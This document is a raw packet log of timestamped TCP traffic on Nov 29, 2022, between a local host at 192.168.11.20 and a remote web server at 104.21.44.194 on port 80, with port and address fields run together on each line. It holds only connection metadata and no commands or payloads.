                                                                          Nov 29, 2022 09:20:40.543838978 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.543838978 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.543838978 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.543838978 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.543838978 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.543838978 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.543844938 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.543854952 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.543854952 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.543854952 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.543855906 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.543987989 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.543998957 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.544004917 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.544004917 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.544004917 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.544004917 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.544004917 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.544009924 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.544020891 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.544152021 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.544267893 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.544281006 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.544313908 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.544326067 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.544337034 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.544348001 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.544348001 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.544348001 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.544358969 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.544368982 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.544380903 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.544393063 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.544404030 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.544414997 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.544425011 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.544437885 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.544449091 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.544517994 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.544517994 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.544517994 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.544517994 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.544517994 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.544517994 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.544517994 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.544517994 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.544534922 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.544534922 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.544534922 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.544534922 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.544683933 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.544684887 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.544696093 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.544706106 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.544717073 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.544727087 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.544855118 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.544855118 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.544855118 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.544856071 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.544856071 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.544967890 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.544979095 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.544989109 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.545000076 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.545010090 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.545021057 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.545025110 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.545031071 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.545042038 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.545052052 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.545063019 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.545196056 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.545196056 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.545196056 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.545196056 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.545196056 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.545248985 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.545260906 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.545272112 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.545281887 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.545293093 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.545304060 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.545315981 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.545327902 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.545339108 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.545350075 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.545360088 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.545367002 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.545372963 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.545383930 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.545393944 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.545404911 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.545414925 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.545425892 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.545439005 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.545449972 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.545516968 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.545516968 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.545517921 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.545517921 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.545517921 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.545517921 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.545517921 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.545517921 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.545536041 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.545542002 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.545542002 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.545542002 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.545542002 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.545542002 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.545542002 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.545547009 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.545557022 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.545567989 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.545578957 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.545684099 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.545684099 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.545684099 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.545684099 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.545830965 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.545842886 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.545860052 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.545861006 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.545867920 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.545878887 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.545890093 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.545900106 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.545911074 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.545922041 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.545932055 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.545943022 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.546020985 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.546091080 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.546190023 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.546376944 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.547702074 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.547813892 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.547826052 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.547866106 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.547951937 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.547964096 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.547974110 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.547985077 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.548022985 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.548079014 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.548079014 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.548110008 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.548121929 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.548188925 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.548226118 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.548226118 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.548226118 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.548226118 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.548300982 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.548320055 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.548376083 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.548420906 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.548450947 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.548588991 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.548616886 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.548628092 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.548639059 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.548650026 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.548660040 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.548671007 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.548687935 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.548698902 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.548710108 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.548719883 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.548729897 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.548741102 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.548751116 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.548757076 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.548757076 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.548757076 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.548762083 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.548773050 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.548783064 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.548794031 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.548804045 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.548835993 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.548846960 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.548857927 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.548868895 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.548888922 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.548899889 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.548909903 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.548929930 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.548929930 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.548929930 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.548929930 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.548929930 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.548929930 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.548929930 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.548929930 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.548942089 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.548945904 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.548945904 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.548945904 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.548945904 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.548945904 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.548953056 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.548963070 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.548974037 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.548995018 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.549047947 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.549058914 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.549098015 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.549098969 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.549098969 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.549098969 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.549098969 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.549098969 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.549098969 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.549098969 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.549098969 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.549108982 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.549113989 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.549119949 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.549129963 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.549139977 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.549149990 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.549206972 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.549217939 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.549228907 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.549238920 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.549246073 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.549246073 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.549246073 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.549246073 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.549249887 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.549410105 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.549410105 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.549580097 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.568830013 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.568945885 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.568957090 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.568968058 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.568979025 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.569015026 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.569034100 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.569061041 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.569092989 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.569104910 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.569130898 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.569144011 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.569154978 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.569165945 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.569176912 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.569189072 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.569200993 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.569238901 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.569238901 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.569360971 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.569372892 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.569384098 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.569400072 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.569408894 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.569420099 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.569443941 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.569457054 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.569468975 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.569478989 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.569489002 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.569499969 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.569511890 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.569523096 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.569534063 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.569545031 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.569552898 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.569564104 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.569575071 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.569580078 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.569580078 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.569580078 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.569580078 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.569580078 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.569580078 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.569585085 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.569596052 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.569607019 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.569617033 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.569627047 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.569638968 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.569648981 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.569659948 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.569669962 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.569680929 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.569690943 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.569701910 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.569710970 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.569734097 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.569734097 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.569734097 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.569734097 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.569744110 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.569768906 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.569785118 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.569925070 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.569925070 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.569925070 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.569925070 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.569925070 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.569925070 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.569925070 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.569925070 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.569947004 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.570086956 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.570245981 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.603734970 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.612219095 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.612297058 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.612401962 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.612416029 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.612426996 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.612438917 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.612451077 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.612462044 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.612473965 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.612484932 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.612497091 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.612508059 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.612519026 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.612531900 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.612601995 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.612735033 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.612747908 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.612760067 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.612771034 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.612771034 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.612773895 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.612786055 CET8049852104.21.44.194192.168.11.20
